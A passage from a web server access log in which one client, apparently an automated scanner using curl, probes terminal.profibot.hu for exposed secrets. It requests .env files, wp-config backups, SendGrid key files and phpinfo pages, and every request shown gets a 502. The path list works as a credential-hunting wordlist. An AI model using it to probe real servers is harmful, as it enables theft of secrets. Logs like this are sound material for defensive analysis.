-] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test/fixtures/node_path/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test/integration/env-config/app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test0.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test1" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test1.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test123.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test2.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test3.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test4.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test5.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test6.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test7.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test8.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test9.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test_info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test_info1.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test_info2.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test_info3.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test_info4.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test_info5.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test_phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test_phpinfo1.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test_phpinfo2.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test_phpinfo3.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test_phpinfo4.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/test_phpinfo5.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:07 +0000] - - 502 - GET https terminal.profibot.hu "/tester.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/testfiles/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/testing.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/testing/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/testing/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/testing/docker/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tests/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/Tests/Application/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tests/default_settings/v10.0/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tests/default_settings/v11.0/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tests/default_settings/v12.0/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tests/default_settings/v13.0/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tests/default_settings/v7.0/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tests/default_settings/v8.0/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tests/default_settings/v9.0/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tests/drupal-test/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tests/Integration/Environment/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tests/todo-react/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/testwork_json/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/theme/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/theme_static/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/thumb/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/thumbs/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tiedostot/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/time.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tmp/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tmp/config/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tmp/logs" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/token.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tool/view/phpinfo.view.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tools/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/Travel_form/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/ts/prime/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/tz.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/u.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/ubuntu/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/ui/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/unixtime/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:08 +0000] - - 502 - GET https terminal.profibot.hu "/unsplash-downloader/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/up.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/upfiles/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/upload/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/uploads/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/urlmem-app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/user/.env.staging" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/user/login" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/User_info/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/v1/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/v1/admin/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/v1/debug/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/v1/private/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/v2/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/var/backup/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/github.com/gobuffalo/envy/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/github.com/subosito/gotenv/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/vendors~main.f286c0f60bdc707d91a8.bundle.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/vercel.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/videos/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/vite.config.ts" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/vm-docker-compose/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/vod_installer/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/vue-end/vue-til/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/vue/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/vue/vuecli/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/vue_CRM/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/w.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/web-dist/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/web.config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/web.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/web/debug/default/view" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/Web/siteMariage/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/webpack-stats.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/webpack.config.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/webroot_path/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/website/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:09 +0000] - - 502 - GET https terminal.profibot.hu "/websocket/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/webstatic/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/webui/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/well-known/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/whturk/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/windows/tests/9.2.x/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/windows/tests/9.3.x/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/wordpress/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/workspace/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.old" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php-backup" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php~" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/debug.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/wp-login.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/wp-login/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/wp.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/wp/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/wpp-config.php~" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/www-data/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/x.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/xx-final/vue-heroes/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/yarn.lock" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/zmusic-frontend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/:443/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/:80/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/:8080/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/:8081/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/:8443/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid_email/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/.env.sendgrid" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid_keys.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/private/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/config/private/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/backup/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/secrets/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:10 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/uploads/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/plugins/wp-mail-smtp/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/plugins/sendgrid_keys.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/modules/contrib/sendgrid_mail/sendgrid_mail.module" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/modules/contrib/sendgrid_mail/sendgrid_mail.settings.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/modules/contrib/sendgrid_mail/sendgrid_mail.services.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https terminal.profibot.hu "/modules/contrib/sendgrid_mail/translations/sendgrid_mail.fr.po" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:11 +0000] - - 502 - GET https 